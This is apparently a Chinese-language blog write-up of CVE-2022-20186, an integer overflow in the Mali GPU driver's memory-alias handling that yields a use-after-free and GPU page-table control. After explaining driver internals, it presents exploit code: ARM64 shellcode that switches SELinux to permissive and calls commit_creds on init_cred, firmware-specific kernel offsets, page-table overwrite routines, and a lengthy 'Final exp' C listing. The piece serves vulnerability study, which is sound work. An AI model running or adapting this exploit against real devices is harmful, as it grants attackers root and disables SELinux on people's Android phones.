CVE-2022-20186 mali gpu	漏洞利用

CVE-2022-20186 mali gpu 漏洞利用

henry Lv4

CVE-2022-20186 mali gpu 漏洞利用

Mali GPU架构的命名灵感源自北欧神话,从 Utgard、Midgard、Bifrost 到最新的 Valhall。大多数现代安卓手机采用的是Bifrost或Valhall 架构,它们的内核驱动程序共享了大量代码。由于这些新架构在很大程度上基于 Midgard 架构,因此在 Bifrost 或 Valhall 驱动程序中有时会存在以“MIDGARD”为前缀的宏(例如MIDGARD_MMU_LEVEL)。

Memory management in the Mali kernel driver

GPU与用户空间进程之间共享内存有多种方式,但在这里仅讨论由驱动程序管理共享内存的情况。在这种情况下,用户首先调用KBASE_IOCTL_MEM_ALLOC ioctlkbase_context中分配页面。这些页面是从kbase_context中的每个上下文内存池 mem_pools中分配的,并且不会立即映射到GPU或用户空间。ioctl向用户返回一个cookie,该cookie随后被用作mmap设备文件的偏移量offset,并将这些页面映射到GPU和用户空间,当使用munmap取消内存映射时,支持页面会被回收回mem_pools。

Kbase_context

kbase_context 为用户空间应用程序与GPU交互定义了一个执行环境。每个与GPU交互的设备文件都有一个独立的 kbase_context。除此之外,kbase_context 还定义了它自己的GPU地址空间,并管理用户空间和GPU的内存共享

1
2
3
4
5
6
7
8
9
10
struct kbase_va_region *kbase_mem_alloc(struct kbase_context *kctx,
u64 va_pages, u64 commit_pages,
u64 extension, u64 *flags, u64 *gpu_va)
{
...
struct kbase_va_region *reg;
...
reg = kbase_alloc_free_region(rbtree, PFN_DOWN(*gpu_va),
va_pages, zone);
...

该函数会创建一个 kbase_ba_region 对象去存储相关内存地址信息,同时该函数也会通过调用 kbase_alloc_phy_pages kbase_context的内存池 mem_pool中分配backing pages(可以理解我们申请的堆块)。

当从64位进程调用时,所创建的区域会存储在kbase_contextpending_regions中,而不是立即进行映射。

1
2
3
4
5
6
7
8
9
10
if (*flags & BASE_MEM_SAME_VA) {
...
kctx->pending_regions[cookie_nr] = reg;

/* relocate to correct base */
cookie = cookie_nr + PFN_DOWN(BASE_MEM_COOKIE_BASE);
cookie <<= PAGE_SHIFT;

*gpu_va = (u64) cookie;
}...

上述代码中的 cookie 值将会返回给用户,该值将可以被用作 mmap 调用的 offset 参数,从而映射申请的内存空间给用户。

Mapping pages to user space

了解在调用mmap映射该区域时虚拟地址是如何分配的这一点非常重要,这里简要介绍用户空间映射,当调用mmap时,会使用 kbase_context_get_unmapped_area 来找到一个空闲区域进行映射:

1
2
3
4
5
6
7
8
9
10
unsigned long kbase_context_get_unmapped_area(struct kbase_context *const kctx,
const unsigned long addr, const unsigned long len,
const unsigned long pgoff, const unsigned long flags)
{
...
ret = kbase_unmapped_area_topdown(&info, is_shader_code,
is_same_4gb_page);
...
return ret;
}

该调用不允许使用 MAP_FIXED 标志将内存映射到固定的虚拟地址。相反,使用 kbase_unmapped_area_topdown 来查找一个足够大以容纳所请求内存的空闲区域,并返回其地址,顾名思义,kbase_unmapped_area_topdown 返回的是可用的最高地址。

然后,将映射的地址存储为 kbase_va_region 中的 start_pfn 字段,从一定程度上这意味着连续映射区域的相对地址是可预测的

1
2
3
4
5
6
7
8
int fd = open("/dev/mali0", O_RDWR);
union kbase_ioctl_mem_alloc alloc;
union kbase_ioctl_mem_alloc alloc2;
...
ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc);
ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc2);
void* region1 = mmap(NULL, 0x1000, prot, MAP_SHARED, fd, alloc.out.gpu_va);
void* region2 = mmap(NULL, 0x1000, prot, MAP_SHARED, fd, alloc2.out.gpu_va)

这里 region2 的虚拟地址将会是 region1-0x1000

Mapping pages to the GPU

每个kbase_context维护着自己的GPU地址空间,并管理自己的GPU页表。同时,每个kbase_context维护着一个四级页表用于将GPU地址转换为支撑的物理页。它有一个mmut字段,用于存储作为pgd字段的顶级页表全局目录(PGD)mmut->pgd被解释为512个元素的int64_t数组的页(512*8 = 4096B = 1KB),其条目指向存储下一级PGD的页帧,直到到达最底层,页表条目(PTE)存储backing pages(以及页面权限)。

由于大多数地址未被访问,PGD 和 PTE 只有在需要时才会被创建:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
static int mmu_get_next_pgd(struct kbase_device *kbdev,
struct kbase_mmu_table *mmut,
phys_addr_t *pgd, u64 vpfn, int level)
{
...
p = pfn_to_page(PFN_DOWN(*pgd));
page = kmap(p);
...
target_pgd = kbdev->mmu_mode->pte_to_phy_addr(page[vpfn]); //<------- 1.

if (!target_pgd) {
target_pgd = kbase_mmu_alloc_pgd(kbdev, mmut); //<------- 2.
...
kbdev->mmu_mode->entry_set_pte(&page[vpfn], target_pgd); //<------- 3.

当一个访问需要特定的页全局目录(Page Global Directory,简称PGD)时,它会从上一级PGD(上述中的1)中查找条目。由于一个PGD的所有条目都被初始化为一个表示条目无效的特定值(magic value),如果之前从未访问过该条目,那么1将返回一个空指针(NULL pointer),这将导致为 target_pgd(上述中的2)分配内存。然后,将 target_pgd的地址作为条目添加到之前的PGD中(上述中的3)。

注意事项

backing target PGD的页帧是通过全局 kbase_device kbdevmem_pools分配的,而 kbdev 是一个所有上下文共享的全局内存池。

当映射内存给GPU时,kbase_gpu_mmap 将会调用kbase_mmu_insert_pages 添加 backing pages到 GPU 页表。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
int kbase_gpu_mmap(struct kbase_context *kctx, struct kbase_va_region *reg, u64 addr, size_t nr_pages, size_t align)
{
...
alloc = reg->gpu_alloc;
...
if (reg->gpu_alloc->type == KBASE_MEM_TYPE_ALIAS) {
...
} else {
err = kbase_mmu_insert_pages(kctx->kbdev,
&kctx->mmu,
reg->start_pfn, //<------ virtual address
kbase_get_gpu_phy_pages(reg), //<------ backing pages
kbase_reg_current_backed_size(reg),
reg->flags & gwt_mask,
kctx->as_nr,
group_id);
...
}
...
}

这将在由reg->start_pfn指定的地址处插入backing pages,该地址也是用户空间中内存区域的地址。

Memory alias

KBASE_IOCTL_MEM_ALIAS 允许多个内存区域共享相同的 backing pages,在 kbase_mem_alias 中实现,接受一个 stride 参数,以及一个 base_mem_aliasing_info 数组,用于指定为别名区域提供支持的内存区域。

1
2
3
4
5
6
7
8
9
10
11
12
13
union kbase_ioctl_mem_alias alias = {0};
alias.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
alias.in.stride = 4;
alias.in.nents = 2;
struct base_mem_aliasing_info ai[2];
ai[0].handle.basep.handle = region1;
ai[1].handle.basep.handle = region2;
ai[0].length = 0x3;
ai[1].length = 0x3;
ai[0].offset = 0;
ai[1].offset = 0;
alias.in.aliasing_info = (uint64_t)(&(ai[0]));
ioctl(mali_fd, KBASE_IOCTL_MEM_ALIAS, &al

在上述,通过将这些区域 region1 和 region2 (两者都是已经映射到 GPU 的区域) 的地址作为 base_mem_aliasing_info::handle::basep::handle 传递,创建了一个由 region1 和 region2 支持的别名区域。

stride 参数表示这两个别名区域之间的间隔(以页为单位),nentsbacking regions 的数量(注意这里不是backing pages),所创建的结果区域的大小为 stride * nents 页,参照下图:

Snipaste_2024-11-19_23-51-35

橙色区域表示整个别名区域,该区域包含2 * 4 = 8页。实际上,只有6页被映射,并且分别由region1region2backing pages 支持。如果别名区域的起始地址是alias_start,那么alias_startalias_start + 0x3000(三页)之间的地址与region1存在别名关系,而region2alias_start + stride * 0x1000alias_start + (stride + 3) * 0x1000之间的地址存在别名关系。

这导致别名区域中有一些间隙未被映射。这可以从kbase_gpu_mmap中处理KBASE_MEM_TYPE_ALIAS内存区域的方式中看出:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
if (reg->gpu_alloc->type == KBASE_MEM_TYPE_ALIAS) {
u64 const stride = alloc->imported.alias.stride;

KBASE_DEBUG_ASSERT(alloc->imported.alias.aliased);
for (i = 0; i < alloc->imported.alias.nents; i++) {
if (alloc->imported.alias.aliased[i].alloc) {
err = kbase_mmu_insert_pages(kctx->kbdev,
&kctx->mmu,
reg->start_pfn + (i * stride), //<------ each region maps at reg->start_pfn + (i * stride)
alloc->imported.alias.aliased[i].alloc->pages + alloc->imported.alias.aliased[i].offset,
alloc->imported.alias.aliased[i].length,
reg->flags & gwt_mask,
kctx->as_nr,
group_id);
...
}
...
}

从上面的代码可以看到reg->start_pfn + (i * stride) 是对应 region 开始的别名内存区域开始映射的起始位置。

Vulnerability

根据前面的内容,可以知道别名区域alias region的大小为stride*nents,代码如下:

1
2
3
4
5
6
7
8
9
10
11
u64 kbase_mem_alias(struct kbase_context *kctx, u64 *flags, u64 stride,
u64 nents, struct base_mem_aliasing_info *ai,
u64 *num_pages)
{
...
if ((nents * stride) > (U64_MAX / PAGE_SIZE))
/* 64-bit address range is the max
goto bad_size;

/* calculate the number of pages this alias will cover */
*num_pages = nents * stride; //<---- size of region

虽然存在 (nents * stride) > (U64_MAX / PAGE_SIZE) 检查,但是并没有做溢出检查,因此这里存在整数溢出,设想下面一个场景:

首先,分配三个0x1000 * 3大小的区域(region1region2region3)分配给GPU并建立映射,并将它们的起始地址分别标记为region1_startregion2_startregion3_start

然后,创建一个别名区域,其步长(stride)为2**63 + 1nents(元素数量)为2,并建立映射。由于整数溢出,别名区域的大小变为2页,特别是,别名区域的起始地址 alias_start = region3_start - 0x2000,其中0x2000是别名区域的大小,当别名区域映射到GPU时,kbase_gpu_mmap将在alias_start处插入三个页面。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
if (reg->gpu_alloc->type == KBASE_MEM_TYPE_ALIAS) {
u64 const stride = alloc->imported.alias.stride;

KBASE_DEBUG_ASSERT(alloc->imported.alias.aliased);
for (i = 0; i < alloc->imported.alias.nents; i++) {
if (alloc->imported.alias.aliased[i].alloc) {
err = kbase_mmu_insert_pages(kctx->kbdev,
&kctx->mmu,
reg->start_pfn + (i * stride), //<------- insert pages at reg->start_pfn, which is alias_start
alloc->imported.alias.aliased[i].alloc->pages + alloc->imported.alias.aliased[i].offset,
alloc->imported.alias.aliased[i].length, //<------- length is the length of the alias region, which is 3
reg->flags & gwt_mask,
kctx->as_nr,
group_id);
...
}
...
}

由于 region1backing pages 大小为 0x3000,而对应region3_start位于alias_start + 0x2000处,因此会导致region_1中一个page大小的页面被映射到 region3 的区域当中,具体情况如下:

Snipaste_2024-11-20_16-34-11

图中右侧的红色矩形表示在重新映射发生后,同时可以被 region1_start + 0x2000region3_start 使用的一个页面。由于标记为红色的backing page同时还由alias region所拥有,即如果这两个区域(region_start & alias)都取消映射,则该页面将被释放并回收到内存池中。

如果在这时候取消这两个区域的映射(对应的页面会被释放到内存池memory region当中),意味着 GPU 仍然可以通过访问 region3_start处的地址来访问这个已被释放的页面,从而顺利完成 UAF 的效果。

剩下的方法与 GHSL-2023-005 中所采用的方法一致,通过堆风水将 backing page 释放到 next_pool 中,然后通过 PGD 分配也会从该内存池中获取页面,从而相当于我们可以通过控制该 UAF 页面来实现对,PGD 页表的读写,从而实现任意物理内存读写这一强大原语。

explain exp

write_adrp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
uint64_t pc_page = pc >> 12;
uint64_t label_page = label >> 12;
int64_t offset = (label_page - pc_page) << 12;
int64_t immhi_mask = 0xffffe0;
int64_t immhi = offset >> 14;
int32_t immlo = (offset >> 12) & 0x3;
uint32_t adpr = rd & 0x1f;
adpr |= (1 << 28);
adpr |= (1 << 31); //op
adpr |= immlo << 29;
adpr |= (immhi_mask & (immhi << 5));
return adpr;
}

void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {

uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
//Sets x0 to init_cred
root_code[ADRP_INIT_INDEX] = init_adpr;
root_code[ADD_INIT_INDEX] = add_init;
//Sets x8 to commit_creds
root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
root_code[ADD_COMMIT_INDEX] = add_commit;
root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
root_code[5] = 0xd63f0100; // blr x8
root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
root_code[7] = 0xd65f03c0; // ret
}

这里需要先解释一下 adrp 指令,ADRP (Add Relative to Instruction Pointer) 是 ARM64 架构中的一条指令,用于将当前指令的程序计数器 (PC) 值与一个相对偏移量相加,得到一个目标地址,并将这个地 址存储到一个寄存器中。以下是 ADRP 指令的构成:

Snipaste_2024-11-28_15-53-56

1
2
3
4
uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
//Sets x0 to init_cred
root_code[ADRP_INIT_INDEX] = init_adpr;
root_code[ADD_INIT_INDEX] = add_init;

这里需要说明的是ARMv8采用的是定长指令集,这里是32位,write_adrp负责生成一条adrp指令,剩下两条指令解释如下:

ADRP 和 ADD 的组合原理

​ • ADRP(Address of Page Relocatable Page):

​ • 将页对齐的地址加载到寄存器中,即目标地址的高位部分。

​ • 它只计算到 4KB 页的基地址,因此低 12 位总是被截断为 0。

​ • ADD(加法指令)

​ • 用于修正 ADRP 产生的基地址,将目标地址的低 12 位(偏移)添加到寄存器中。

由于 ADRP 只能处理 4KB 页对齐的地址,但实际的目标地址可能位于某个页内的特定偏移位置。例如:

​ • 假设 label 地址是 0x12345678。

​ • ADRP 只能加载 0x12345000(页对齐的高地址)。

​ • ADD 则需要将偏移 0x678 添加到 ADRP 结果中

map_gpu

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
void* map_gpu(int mali_fd, unsigned int pages, bool read_only, int group) {
union kbase_ioctl_mem_alloc alloc = {0};
alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22);
int prot = PROT_READ | PROT_WRITE;
if (!read_only) {
alloc.in.flags |= BASE_MEM_PROT_GPU_WR;
prot |= PROT_WRITE;
}
alloc.in.va_pages = pages;
alloc.in.commit_pages = pages;
mem_alloc(mali_fd, &alloc);
void* region = mmap(NULL, 0x1000 * pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va);
if (region == MAP_FAILED) {
err(1, "mmap failed");
}
return region;
}

void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) {
void* jc_region = map_gpu(mali_fd, 1, false, 0); // --> 1
//....
}

void* drain_mem_pool(int mali_fd) {
return map_gpu(mali_fd, POOL_SIZE, false, 1); // --> 2
}

int run_exploit() {
int mali_fd = open_dev(MALI);

//Regions for triggering the bug
for (int i = 0; i < 2; i++) {
void* region = map_gpu(mali_fd, 3, false, 1); // --> 3
gpu_va[i] = (uint64_t)region;
}
}

map_gpu中的group指定了申请的内容属于哪个组,在这个例子中,我们在 write_to 的时候设置的group为0,而触发漏洞的group设置为1,因此可以将这两块内存隔离,而不受影响。

write_func

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
uint64_t set_addr_lv3(uint64_t addr) {
uint64_t pfn = addr >> PAGE_SHIFT;
pfn &= ~ 0x1FFUL;
pfn |= 0x100UL;
return pfn << PAGE_SHIFT;
}

static inline uint64_t compute_pt_index(uint64_t addr, int level) {
uint64_t vpfn = addr >> PAGE_SHIFT;
vpfn >>= (3 - level) * 9;
return vpfn & 0x1FF;
}

void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
uint64_t curr_overwrite_addr = 0;
for (int i = 0; i < size; i++) {
uint64_t base = reserved[i];
uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000;
uint64_t start_idx = compute_pt_index(base, 3);
uint64_t end_idx = compute_pt_index(end, 3);
printf("===========value i = %d ===============\n", i);
for (uint64_t addr = base; addr < end; addr += 0x1000) {
uint64_t overwrite_addr = set_addr_lv3(addr);
if (curr_overwrite_addr != overwrite_addr) {
printf("base == %lx\n", base);
printf("end == %lx\n", end);
printf("overwrite_addr == %lx\n", overwrite_addr);
printf("curr_overwrite_addr == %lx\n", curr_overwrite_addr);
printf("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
curr_overwrite_addr = overwrite_addr;
for (int code = code_size - 1; code >= 0; code--) {
write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
}
usleep(300000);
}
}
}
}

int main(){
//...
uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
//Writing to gpu_va[1] will now overwrite the level 3 pgd in one of the reserved pages mapped earlier.
for (int i = 0; i < 2; i++) {
write_to(mali_fd, gpu_va[1] + i * 0x1000 + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
}
usleep(100000);
//Go through the reserve pages addresses to write to sel_read_enforce with our own shellcode
write_func(mali_fd, avc_deny, &(reserved[0]), TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));
debug();
//...
}

上面 for 循环中的 write_to 用于覆盖页表项,注意这里的OVERWRITE_INDEX 的值为 0x100 = 256,此时可以理解为gpu_va[1] + i * 0x1000已经指向了一张 level 3 pgd 页表,我们修改了第 256 个页表项的内容(位于0x100*8 = 0x800处),修改的内容为avc_deny这个函数物理地址所对应的页帧号,这一操作通过(((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443 完成,其中 0x443 是对应页表项低 12位的属性字段的值(具体可参考armV8 文档)用来保证页表项有效且可对页面进行读写。

在修改了页表项之后,此时 reserved[i]中的某一页已经指向了对应的avc_deny函数所在的页面,一种暴力的方法是我们直接对遍历每一个reserved[i] + j * 0x1000 修改对应的avc_deny函数偏移处的代码,但实际上完全不用这么做,armV8 采用的是三级页表,总共的有效地址位数为3 * 9 + 12 = 39,其中三级页表对应的索引为 addr[20:12],由于我们将 OVERWRITE_INDEX设置为了256,因此只要对应虚拟地址三级索引设置为0x100,我们就能够定位到所修改的 evil 页表项的位置,这也解释了set_addr_lv3中为什么有了这段代码 pfn &= ~ 0x1FFUL; pfn |= 0x100UL;,也就意味着仅仅需要关注reserved[i] + j*0x1000 虚拟地址中对应一级索引和二级索引不一样的地址就行。

作为验证可以把OVERWRITE_INDEX 设置为 255(0xff),然后在 set_addr_lv3 中对应的设置为pfn |= 0xffUL也能成功命中对应的页表项。

Snipaste_2024-11-29_18-23-59

最终效果如下:

Snipaste_2024-12-02_16-48-48

Final exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <ctype.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/system_properties.h>

#include "stdbool.h"

#include "mali.h"
#include "mali_base_jm_kernel.h"
#include "midgard.h"

#define MALI "/dev/mali0"

#define PAGE_SHIFT 12

#define BASE_MEM_ALIAS_MAX_ENTS ((size_t)24576)

#define PFN_DOWN(x) ((x) >> PAGE_SHIFT)

#define POOL_SIZE 16384

#define RESERVED_SIZE 32

#define TOTAL_RESERVED_SIZE 1024

#define KERNEL_BASE 0x80000000

#define OVERWRITE_INDEX 256

#define ADRP_INIT_INDEX 0

#define ADD_INIT_INDEX 1

#define ADRP_COMMIT_INDEX 2

#define ADD_COMMIT_INDEX 3

#define AVC_DENY_2108 0x92df1c

#define SEL_READ_ENFORCE_2108 0x942ae4

#define INIT_CRED_2108 0x29a0570

#define COMMIT_CREDS_2108 0x180b0c

#define ADD_INIT_2108 0x9115c000

#define ADD_COMMIT_2108 0x912c3108

#define AVC_DENY_2201 0x930af4

#define SEL_READ_ENFORCE_2201 0x9456bc

#define INIT_CRED_2201 0x29b0570

#define COMMIT_CREDS_2201 0x183df0

#define ADD_INIT_2201 0x9115c000

#define ADD_COMMIT_2201 0x9137c108

#define AVC_DENY_2202 0x930b50

#define SEL_READ_ENFORCE_2202 0x94551c

#define INIT_CRED_2202 0x29b0570

#define COMMIT_CREDS_2202 0x183e3c

#define ADD_INIT_2202 0x9115c000 //add x0, x0, #0x570

#define ADD_COMMIT_2202 0x9138f108 //add x8, x8, #0xe3c
#define debug()(printf("Press enter to continue.\n"), (void)getchar())

static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2108;

static uint64_t avc_deny = AVC_DENY_2108;

static int atom_number = 1;

/*
Overwriting SELinux to permissive
strb wzr, [x0]
mov x0, #0
ret
*/
static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0};

static uint32_t root_code[8] = {0};

struct base_mem_handle {
struct {
__u64 handle;
} basep;
};

struct base_mem_aliasing_info {
struct base_mem_handle handle;
__u64 offset;
__u64 length;
};

void print_binary(void *addr, int len)
{
size_t *buf64 = (size_t *) addr;
char *buf8 = (char *) addr;
for (int i = 0; i < len / 8; i += 2) {
printf(" %04x", i * 8);
for (int j = 0; j < 2; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 16 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}

static int open_dev(char* name) {
int fd = open(name, O_RDWR);
if (fd == -1) {
err(1, "cannot open %s\n", name);
}
return fd;
}

void setup_mali(int fd) {
struct kbase_ioctl_version_check param = {0};
if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, &param) < 0) {
err(1, "version check failed\n");
}
struct kbase_ioctl_set_flags set_flags = {1 << 3};
if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) {
err(1, "set flags failed\n");
}
}

void* setup_tracking_page(int fd) {
void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE);
if (region == MAP_FAILED) {
err(1, "setup tracking page failed");
}
return region;
}

void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) {
if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) {
err(1, "mem_alloc failed\n");
}
}

void mem_alias(int fd, union kbase_ioctl_mem_alias* alias) {
if (ioctl(fd, KBASE_IOCTL_MEM_ALIAS, alias) < 0) {
err(1, "mem_alias failed\n");
}
}

void mem_query(int fd, union kbase_ioctl_mem_query* query) {
if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) {
err(1, "mem_query failed\n");
}
}

uint32_t lo32(uint64_t x) {
return x & 0xffffffff;
}

uint32_t hi32(uint64_t x) {
return x >> 32;
}

uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
uint64_t pc_page = pc >> 12;
uint64_t label_page = label >> 12;
int64_t offset = (label_page - pc_page) << 12;
int64_t immhi_mask = 0xffffe0;
int64_t immhi = offset >> 14;
int32_t immlo = (offset >> 12) & 0x3;
uint32_t adpr = rd & 0x1f;
adpr |= (1 << 28);
adpr |= (1 << 31); //op
adpr |= immlo << 29;
adpr |= (immhi_mask & (immhi << 5));
return adpr;
}

void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {

uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
//Sets x0 to init_cred
root_code[ADRP_INIT_INDEX] = init_adpr;
root_code[ADD_INIT_INDEX] = add_init;
//Sets x8 to commit_creds
root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
root_code[ADD_COMMIT_INDEX] = add_commit;
root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
root_code[5] = 0xd63f0100; // blr x8
root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
root_code[7] = 0xd65f03c0; // ret
}

void* map_gpu(int mali_fd, unsigned int pages, bool read_only, int group) {
union kbase_ioctl_mem_alloc alloc = {0};
alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22);
int prot = PROT_READ | PROT_WRITE;
if (!read_only) {
alloc.in.flags |= BASE_MEM_PROT_GPU_WR;
prot |= PROT_WRITE;
}
alloc.in.va_pages = pages;
alloc.in.commit_pages = pages;
mem_alloc(mali_fd, &alloc);
void* region = mmap(NULL, 0x1000 * pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va);
if (region == MAP_FAILED) {
err(1, "mmap failed");
}
return region;
}

void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) {
void* jc_region = map_gpu(mali_fd, 1, false, 0);
struct MALI_JOB_HEADER jh = {0};
jh.is_64b = true;
jh.type = MALI_JOB_TYPE_WRITE_VALUE;

struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
payload.type = type;
payload.immediate_value = value;
payload.address = gpu_addr;

MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh);
MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload);

uint32_t* section = (uint32_t*)jc_region;
struct base_jd_atom_v2 atom = {0};
atom.jc = (uint64_t)jc_region;
atom.atom_number = atom_number;
atom.core_req = BASE_JD_REQ_CS;
struct kbase_ioctl_job_submit submit = {0};
submit.addr = (uint64_t)(&atom);
submit.nr_atoms = 1;
submit.stride = sizeof(struct base_jd_atom_v2);
if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
err(1, "submit job failed\n");
}
usleep(10000);
}

void* drain_mem_pool(int mali_fd) {
return map_gpu(mali_fd, POOL_SIZE, false, 1);
}

void release_mem_pool(void* drain) {
munmap(drain, POOL_SIZE * 0x1000);
}

/**
* 1. reserve_pages 函数:
向 GPU 驱动请求分配 nents 个内存块,每个内存块包含 pages 页,并记录返回的 GPU 虚拟地址。
2. map_reserved 函数:
将这些分配的内存块映射到用户进程的虚拟地址空间,并更新 reserved_va 存储用户空间地址。
*/
void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
for (int i = 0; i < nents; i++) {
union kbase_ioctl_mem_alloc alloc = {0};
alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
int prot = PROT_READ | PROT_WRITE;
alloc.in.va_pages = pages;
alloc.in.commit_pages = pages;
mem_alloc(mali_fd, &alloc);
reserved_va[i] = alloc.out.gpu_va;
}
}

void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
for (int i = 0; i < nents; i++) {
void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]);
if (reserved == MAP_FAILED) {
err(1, "mmap reserved failed");
}
reserved_va[i] = (uint64_t)reserved;
}
}

uint64_t set_addr_lv3(uint64_t addr) {
uint64_t pfn = addr >> PAGE_SHIFT;
pfn &= ~ 0x1FFUL;
pfn |= 0x100UL;
return pfn << PAGE_SHIFT;
}

static inline uint64_t compute_pt_index(uint64_t addr, int level) {
uint64_t vpfn = addr >> PAGE_SHIFT;
vpfn >>= (3 - level) * 9;
return vpfn & 0x1FF;
}

